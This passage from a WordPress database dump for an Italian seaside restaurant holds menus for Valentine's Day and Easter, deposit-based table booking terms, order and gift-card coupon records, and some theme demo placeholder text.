ORDER #585','solymarcouponPFCCD','GIFTCARD ORDER #585','publish','closed','closed','','solymarcouponpfccd','','','2018-01-11 21:57:32','2018-01-11 20:57:32','',0,'http://www.ristorantesolymar.it/2018/01/11/solymarcouponpfccd/',0,'shop_coupon','',0),(4305,1,'2018-08-13 08:19:15','2018-08-13 08:19:15','','h7-port-img-2','','inherit','open','closed','','h7-port-img-2','','','2018-08-13 08:19:15','2018-08-13 08:19:15','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-2.jpg',0,'attachment','image/jpeg',0),(588,1,'2020-01-31 12:19:36','2020-01-31 11:19:36','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2020/01/solymar-14-febbraio-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-944\" /><em>La vita ha due doni preziosi: la bellezza e la verità. La prima l’ho trovata nel cuore di chi ama e la seconda nella mano di chi lavora.\n(Khalil Gibran)</em>\n\nMenù week end di San Valentino\nSan Valentino e Cena del 15 -2\n\n- Entrée di Benvenuto\n- Carpaccio di Mazzancolle nostrane, campari, arancio e kefir\n- Noci di Capasanta arrostita.crema di finocchio allo zenzero e salicornia\n- Calamaro puntarelle e Alici del Cantambrico\n- Tortelli di patate e burrata sl ragù di Astice e pomodorini\n- Rollé di Sogliola nostrana al tartufo su patata fondente\n&#x1f370;Cioccolato bianco lampone e liquirizia\n-caffè\n\n€ 55 a persona bevande escluse\nPrenotazione con caparra (obbligatoria )\nwww.ristorantesolymar.it\n\n\n\n\nModalità di prenotazione online per la cena di San Valentino 2020\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 20,00 di mercoledi 12 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\nLa ricevuta del pagamento, vale come conferma di prenotazione\nAcquistando il tavolo si accettano le condizioni sopracitate.\nGrazie per la comprensione\nTeo & Barbara','Prenotazione Tavolo per 2 Persone San Valentino','Tavolo per 2 persone serata San Valentino - anticipo caparra confirmatoria. La caparra si intende per 2 persone (15euro x 2)','inherit','closed','closed','','288-autosave-v1','','','2020-01-31 12:19:36','2020-01-31 11:19:36','',288,'http://www.ristorantesolymar.it/2018/01/27/288-autosave-v1/',0,'revision','',0),(589,1,'2018-01-27 17:48:41','2018-01-27 16:48:41','','sanvalentino','','inherit','open','closed','','sanvalentino','','','2018-01-27 17:48:41','2018-01-27 16:48:41','',288,'http://www.ristorantesolymar.it/wp-content/uploads/2017/02/sanvalentino.jpg',0,'attachment','image/jpeg',0),(590,2,'2018-01-27 17:53:38','2018-01-27 16:53:38','<em>Sashimi di salmone su cialda croccante all’alga nori e maionese al wasabi\r\n\r\nMazzancolla nostrana e carciofi brasati\r\n \r\nBaccalà a bassa temperatura su schiacciata di patate e olive taggiasche\r\n\r\nGnocco rapa rossa , frutti di mare , salsa ai ricci e burrata\r\n\r\nTataki di ricciola e indivia agli agrumi\r\n\r\nPera cioccolato e zabaione</em>\r\n\r\n55€ a persona escluse bevande. \r\n\r\nPrenota online il tuo tavolo:\r\n[product_category category=\"san-valentino\"]','Menù di San Valentino 2018','','publish','open','open','','menu-san-valentino-2018','','','2018-01-27 17:54:53','2018-01-27 16:54:53','',0,'http://www.ristorantesolymar.it/?p=590',0,'post','',0),(591,1,'2018-01-27 17:53:38','2018-01-27 16:53:38','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/02/sanvalentino-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" class=\"alignleft size-medium wp-image-589\" />Sashimi di salmone su cialda croccante all’alga nori e maionese al wasabi\r\n\r\nMazzancolla nostrana e carciofi brasati\r\n \r\nBaccalà a bassa temperatura su schiacciata di patate e olive taggiasche\r\n\r\nGnocco rapa rossa , frutti di mare , salsa ai ricci e burrata\r\n\r\nTataki di ricciola e indivia agli agrumi\r\n\r\nPera cioccolato e zabaione\r\n\r\n55€ a persona escluse bevande\r\n[product_category category=\"sanvalentino\"]','Menù di San Valentino 2018','','inherit','closed','closed','','590-revision-v1','','','2018-01-27 17:53:38','2018-01-27 16:53:38','',590,'http://www.ristorantesolymar.it/2018/01/27/590-revision-v1/',0,'revision','',0),(592,1,'2018-01-27 17:54:19','2018-01-27 16:54:19','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/02/sanvalentino-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" class=\"alignleft size-medium wp-image-589\" /><em>Sashimi di salmone su cialda croccante all’alga nori e maionese al wasabi\r\n\r\nMazzancolla nostrana e carciofi brasati\r\n \r\nBaccalà a bassa temperatura su schiacciata di patate e olive taggiasche\r\n\r\nGnocco rapa rossa , frutti di mare , salsa ai ricci e burrata\r\n\r\nTataki di ricciola e indivia agli agrumi\r\n\r\nPera cioccolato e zabaione</em>\r\n\r\n55€ a persona escluse bevande. Prenota online il tuo tavolo:\r\n\r\n[product_category category=\"san-valentino\"]','Menù di San Valentino 2018','','inherit','closed','closed','','590-revision-v1','','','2018-01-27 17:54:19','2018-01-27 16:54:19','',590,'http://www.ristorantesolymar.it/2018/01/27/590-revision-v1/',0,'revision','',0),(593,1,'2018-01-27 17:54:53','2018-01-27 16:54:53','<em>Sashimi di salmone su cialda croccante all’alga nori e maionese al wasabi\r\n\r\nMazzancolla nostrana e carciofi brasati\r\n \r\nBaccalà a bassa temperatura su schiacciata di patate e olive taggiasche\r\n\r\nGnocco rapa rossa , frutti di mare , salsa ai ricci e burrata\r\n\r\nTataki di ricciola e indivia agli agrumi\r\n\r\nPera cioccolato e zabaione</em>\r\n\r\n55€ a persona escluse bevande. \r\n\r\nPrenota online il tuo tavolo:\r\n[product_category category=\"san-valentino\"]','Menù di San Valentino 2018','','inherit','closed','closed','','590-revision-v1','','','2018-01-27 17:54:53','2018-01-27 16:54:53','',590,'http://www.ristorantesolymar.it/2018/01/27/590-revision-v1/',0,'revision','',0),(594,1,'2018-01-27 20:22:45','2018-01-27 19:22:45','','Order &ndash; gennaio 27, 2018 @ 08:22 PM','','wc-processing','open','closed','order_5a6cd1851f13f','ordine-jan-27-2018-0722-pm','','','2018-01-27 20:23:29','2018-01-27 19:23:29','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=594',0,'shop_order','',3),(595,1,'2018-01-29 15:01:15','2018-01-29 14:01:15','','Order &ndash; gennaio 29, 2018 @ 03:01 PM','','wc-processing','open','closed','order_5a6f292b5750f','ordine-jan-29-2018-0201-pm','','','2018-01-29 15:01:40','2018-01-29 14:01:40','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=595',0,'shop_order','',3),(596,1,'2018-02-03 22:01:08','2018-02-03 21:01:08','','Order &ndash; febbraio 3, 2018 @ 10:01 PM','','wc-cancelled','open','closed','order_5a76231470cf7','ordine-feb-03-2018-0901-pm','','','2018-02-03 23:16:45','2018-02-03 22:16:45','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=596',0,'shop_order','',1),(597,1,'2018-02-04 18:34:50','2018-02-04 17:34:50','','Order &ndash; febbraio 4, 2018 @ 06:34 PM','','wc-processing','open','closed','order_5a77443a896bf','ordine-feb-04-2018-0534-pm','','','2018-02-04 18:37:05','2018-02-04 17:37:05','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=597',0,'shop_order','',3),(598,1,'2018-02-06 18:55:23','2018-02-06 17:55:23','','Order &ndash; febbraio 6, 2018 @ 06:55 PM','','wc-cancelled','open','closed','order_5a79ec0b45835','ordine-feb-06-2018-0555-pm','','','2018-02-06 19:58:50','2018-02-06 18:58:50','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=598',0,'shop_order','',1),(599,1,'2018-02-08 15:01:34','2018-02-08 14:01:34','','Order &ndash; febbraio 8, 2018 @ 03:01 PM','','wc-processing','open','closed','order_5a7c583eb895f','ordine-feb-08-2018-0201-pm','','','2018-02-08 15:03:31','2018-02-08 14:03:31','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=599',0,'shop_order','',3),(600,1,'2018-02-11 19:36:41','2018-02-11 18:36:41','','Order &ndash; febbraio 11, 2018 @ 07:36 PM','','wc-processing','open','closed','order_5a808d3997a4a','ordine-feb-11-2018-0636-pm','','','2018-02-11 19:41:32','2018-02-11 18:41:32','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=600',0,'shop_order','',3),(601,1,'2018-02-11 21:32:49','2018-02-11 20:32:49','','Order &ndash; febbraio 11, 2018 @ 09:32 PM','','wc-processing','open','closed','order_5a80a871da836','ordine-feb-11-2018-0832-pm','','','2018-02-11 21:35:48','2018-02-11 20:35:48','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=601',0,'shop_order','',3),(602,1,'2018-02-12 17:12:21','2018-02-12 16:12:21','','Order &ndash; febbraio 12, 2018 @ 05:12 PM','','wc-processing','open','closed','order_5a81bce55c17c','ordine-feb-12-2018-0412-pm','','','2018-02-12 17:15:12','2018-02-12 16:15:12','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=602',0,'shop_order','',3),(603,1,'2018-08-07 08:28:28','2018-08-07 08:28:28','','3','','publish','closed','closed','','3','','','2018-08-07 08:28:28','2018-08-07 08:28:28','',0,'http://attika.mikado-themes.com/?post_type=testimonials&amp;p=603',0,'testimonials','',0),(604,1,'2018-02-12 18:16:47','2018-02-12 17:16:47','','Order &ndash; febbraio 12, 2018 @ 06:16 PM','','wc-processing','open','closed','order_5a81cbff68419','ordine-feb-12-2018-0516-pm','','','2018-02-12 18:19:24','2018-02-12 17:19:24','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=604',0,'shop_order','',3),(605,1,'2018-02-12 18:49:50','2018-02-12 17:49:50','','Order &ndash; febbraio 12, 2018 @ 06:49 PM','','wc-processing','open','closed','order_5a81d3be845d9','ordine-feb-12-2018-0549-pm','','','2018-02-12 18:52:09','2018-02-12 17:52:09','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=605',0,'shop_order','',3),(606,1,'2018-02-12 19:16:46','2018-02-12 18:16:46','','Order &ndash; febbraio 12, 2018 @ 07:16 PM','','wc-processing','open','closed','order_5a81da0e5589a','ordine-feb-12-2018-0616-pm','','','2018-02-12 19:19:55','2018-02-12 18:19:55','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=606',0,'shop_order','',3),(607,1,'2018-02-12 21:25:39','2018-02-12 20:25:39','','Order &ndash; febbraio 12, 2018 @ 09:25 PM','','wc-cancelled','open','closed','order_5a81f8439ac09','ordine-feb-12-2018-0825-pm','','','2018-02-12 21:27:47','2018-02-12 20:27:47','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=607',0,'shop_order','',1),(608,1,'2018-02-12 21:28:32','2018-02-12 20:28:32','','Order &ndash; febbraio 12, 2018 @ 09:28 PM','','wc-cancelled','open','closed','order_5a81f8f0ba881','ordine-feb-12-2018-0828-pm','','','2018-02-12 21:30:29','2018-02-12 20:30:29','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=608',0,'shop_order','',1),(609,1,'2018-02-12 21:35:30','2018-02-12 20:35:30','','Order &ndash; febbraio 12, 2018 @ 09:35 PM','','wc-processing','open','closed','order_5a81fa921616b','ordine-feb-12-2018-0835-pm','','','2018-02-12 21:36:18','2018-02-12 20:36:18','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=609',0,'shop_order','',3),(610,1,'2018-02-13 11:12:35','2018-02-13 10:12:35','','Order &ndash; febbraio 13, 2018 @ 11:12 AM','','wc-processing','open','closed','order_5a82ba1380d18','ordine-feb-13-2018-1012-am','','','2018-02-13 11:13:24','2018-02-13 10:13:24','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=610',0,'shop_order','',3),(611,1,'2018-02-13 18:44:49','2018-02-13 17:44:49','','Order &ndash; febbraio 13, 2018 @ 06:44 PM','','wc-processing','open','closed','order_5a83241189b2f','ordine-feb-13-2018-0544-pm','','','2018-02-13 18:49:47','2018-02-13 17:49:47','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=611',0,'shop_order','',3),(612,1,'2018-02-13 19:34:40','2018-02-13 18:34:40','','Order &ndash; febbraio 13, 2018 @ 07:34 PM','','wc-cancelled','open','closed','order_5a832fc035e8d','ordine-feb-13-2018-0634-pm','','','2018-02-13 20:33:00','2018-02-13 19:33:00','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=612',0,'shop_order','',1),(613,1,'2018-02-13 19:36:29','2018-02-13 18:36:29','','Order &ndash; febbraio 13, 2018 @ 07:36 PM','','wc-processing','open','closed','order_5a83302dabc7c','ordine-feb-13-2018-0636-pm','','','2018-02-13 19:37:05','2018-02-13 18:37:05','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=613',0,'shop_order','',3),(614,1,'2018-02-14 14:24:36','2018-02-14 13:24:36','','Order &ndash; febbraio 14, 2018 @ 02:24 PM','','wc-processing','open','closed','order_5a8438946b8f9','ordine-feb-14-2018-0124-pm','','','2018-02-14 14:25:28','2018-02-14 13:25:28','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=614',0,'shop_order','',3),(615,1,'2018-02-14 16:04:56','2018-02-14 15:04:56','','Order &ndash; febbraio 14, 2018 @ 04:04 PM','','wc-processing','open','closed','order_5a845018401b7','ordine-feb-14-2018-0304-pm','','','2018-02-14 16:07:38','2018-02-14 15:07:38','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=615',0,'shop_order','',3),(616,1,'2018-02-19 21:38:41','2018-02-19 20:38:41','','Order &ndash; febbraio 19, 2018 @ 09:38 PM','','wc-processing','closed','closed','order_5a8b35d14be36','ordine-feb-19-2018-0838-pm','','','2018-03-07 17:31:17','2018-03-07 16:31:17','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=616',0,'shop_order','',2),(617,0,'2018-02-19 21:42:01','2018-02-19 20:42:01','GIFTCARD ORDER #616','solymarcouponFY0OW','GIFTCARD ORDER #616','publish','closed','closed','','solymarcouponfy0ow','','','2018-02-19 21:42:01','2018-02-19 20:42:01','',0,'http://www.ristorantesolymar.it/2018/02/19/solymarcouponfy0ow/',0,'shop_coupon','',0),(618,1,'2018-08-07 10:24:31','2018-08-07 10:24:31','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Cold Raspberry','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','cold-raspberry','','','2018-08-07 10:24:31','2018-08-07 10:24:31','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=618',0,'portfolio-item','',0),(620,2,'2018-03-10 09:38:50','2018-03-10 08:38:50','<strong>Menù per il pranzo di Pasqua</strong>\r\n\r\nTartara di gambero rosa con variazione di carota violetta, rapa rossa e passion fruit\r\n\r\nNoci di capasanta con finocchio al lime maionese e polvere di corallo\r\n\r\nParmigiana di orata\r\n\r\nGarganelli al bianco di canocchie asparagi e zenzero\r\n\r\nTrancio di gallinella alla piastra, patata fondente e brodetto\r\n\r\nTenerina fondente alla liquirizia, kumquat e mojito\r\n\r\n€ 55 a persona bevande escluse\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\n\r\nda 7 a 14 menù bambini a 25€\r\nDa 15 anni menù grandi\r\n\r\n[products category=\"pasqua\" columns=\"4\"]\r\n\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\nMenù alla carta,\r\nPrenotazione con caparra con le stesse modalità di Pasqua\r\n\r\n[products category=\"pasquetta\" columns=\"4\"]\r\n\r\nModalità di prenotazione per il pranzo di Pasqua e Pasquetta\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nAnche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente.\r\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\r\nÈ possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE  E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22  per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante.\r\n\r\n Dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@www.ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo & Barbara','Menù di Pasqua e Pasquetta 2018','','publish','open','open','','menu-di-pasqua-e-pasquetta-2018','','','2018-03-12 15:27:47','2018-03-12 14:27:47','',0,'http://www.ristorantesolymar.it/?p=620',0,'post','',0),(621,1,'2018-03-10 08:30:17','2018-03-10 07:30:17','<strong>Menù per il pranzo di Pasqua</strong>\r\n\r\nTartara di gambero rosa con variazione di carota violetta, rapa rossa e passion fruit\r\n\r\nNoci di capasanta con finocchio al lime maionese e polvere di corallo\r\n\r\nParmigiana di orata\r\n\r\nGarganelli al bianco di canocchie asparagi e zenzero\r\n\r\nTrancio di gallinella alla piastra, patata fondente e brodetto\r\n\r\nTenerina fondente alla liquirizia, kumquat e mojito\r\n\r\n€ 55 a persona bevande escluse\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\n\r\n da 7 a 14 menù bambini a 25€\r\nDa 15 anni menù grandi\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\nMenù alla carta,\r\nPrenotazione con caparra con le stesse modalità di Pasqua\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nAnche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente.\r\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\r\nÈ possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE  E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22  per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante.\r\n\r\nDopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@www.ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo & Barbara','Menù di Pasqua e Pasquetta 2018','','inherit','closed','closed','','620-revision-v1','','','2018-03-10 08:30:17','2018-03-10 07:30:17','',620,'http://www.ristorantesolymar.it/2018/03/10/620-revision-v1/',0,'revision','',0),(622,1,'2018-03-10 08:34:12','2018-03-10 07:34:12','Tavolo per 4 persone giorno di Pasquetta 2018 - anticipo caparra confirmatoria. La caparra si intende per 4 persone (25euro x 4)\n\n<strong>Pranzo di Pasquetta</strong>\nMenù alla carta\n\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\nAnche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente.\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\nÈ possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE  E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22  per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante.\n\nDopo tale data, la caparra pagata diventerà rimborso in caso di no show.\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show.\nLa ricevuta del pagamento, vale come conferma di prenotazione\nAcquistando il tavolo si accettano le condizioni sopracitate.\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@www.ristorantesolymar.it\nGrazie per la comprensione\nTeo & Barbara','Prenotazione Tavolo per 4 Persone - Pasquetta','Prenotazione tavolo per 4 persone per il giorno di Pasquetta','inherit','closed','closed','','329-autosave-v1','','','2018-03-10 08:34:12','2018-03-10 07:34:12','',329,'http://www.ristorantesolymar.it/2018/03/10/329-autosave-v1/',0,'revision','',0),(623,1,'2018-03-13 17:55:15','2018-03-13 16:55:15','Tavolo per 8 persone giorno di Pasquetta 2018 - anticipo caparra confirmatoria. La caparra si intende per 8 persone (25euro x 8)\n\n<strong>Pranzo di Pasquetta</strong>\nMenù alla carta\n\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\nAnche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente.\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\nÈ possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE  E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22  per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante.\n\nDopo tale data, la caparra pagata diventerà rimborso in caso di no show.\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show.\nLa ricevuta del pagamento, vale come conferma di prenotazione\nAcquistando il tavolo si accettano le condizioni sopracitate.\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@www.ristorantesolymar.it\nGrazie per la comprensione\nTeo & Barbara','Prenotazione Tavolo per 8 Persone - Pasquetta','Tavolo per 8 persone giorno di Pasquetta 2018 - anticipo caparra confirmatoria. La caparra si intende per 8 persone (25euro x 8)','inherit','closed','closed','','334-autosave-v1','','','2018-03-13 17:55:15','2018-03-13 16:55:15','',334,'http://www.ristorantesolymar.it/2018/03/10/334-autosave-v1/',0,'revision','',0),(624,1,'2018-03-13 17:56:59','2018-03-13 16:56:59','Tavolo per 7 persone giorno di Pasqua 2018 - anticipo caparra confirmatoria. La caparra si intende per 7 persone (25euro x 7)\n\n<strong>Menù per il pranzo di Pasqua</strong>\n\nTartara di gambero rosa con variazione di carota violetta, rapa rossa e passion fruit\n\nNoci di capasanta con finocchio al lime maionese e polvere di corallo\n\nParmigiana di orata\n\nGarganelli al bianco di canocchie asparagi e zenzero\n\nTrancio di gallinella alla piastra, patata fondente e brodetto\n\nTenerina fondente alla liquirizia, kumquat e mojito\n\n€ 55 a persona bevande escluse\n\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\n\n da 7 a 14 menù bambini a 25€\nDa 15 anni menù grandi\n\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\nAnche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente.\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\nÈ possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE  E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22  per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante.\n\nDopo tale data, la caparra pagata diventerà rimborso in caso di no show.\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show.\nLa ricevuta del pagamento, vale come conferma di prenotazione\nAcquistando il tavolo si accettano le condizioni sopracitate.\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@www.ristorantesolymar.it\nGrazie per la comprensione\nTeo & Barbara','Prenotazione Tavolo per 7 Persone - Pasqua','Tavolo per 7 persone giorno di Pasqua 2018 - anticipo caparra confirmatoria. La caparra si intende per 7 persone (25euro x 7)','inherit','closed','closed','','333-autosave-v1','','','2018-03-13 17:56:59','2018-03-13 16:56:59','',333,'http://www.ristorantesolymar.it/2018/03/10/333-autosave-v1/',0,'revision','',0),(625,1,'2018-03-10 09:24:01','2018-03-10 08:24:01','Tavolo per 3 persone giorno di Pasqua 2018 - anticipo caparra confirmatoria. La caparra si intende per 3 persone (25euro x 3)','Prenotazione Tavolo per 3 Persone - Pasqua','Prenotazione tavolo per 3 persone per il giorno di Pasqua','inherit','closed','closed','','323-autosave-v1','','','2018-03-10 09:24:01','2018-03-10 08:24:01','',323,'http://www.ristorantesolymar.it/2018/03/10/323-autosave-v1/',0,'revision','',0),(626,1,'2018-03-10 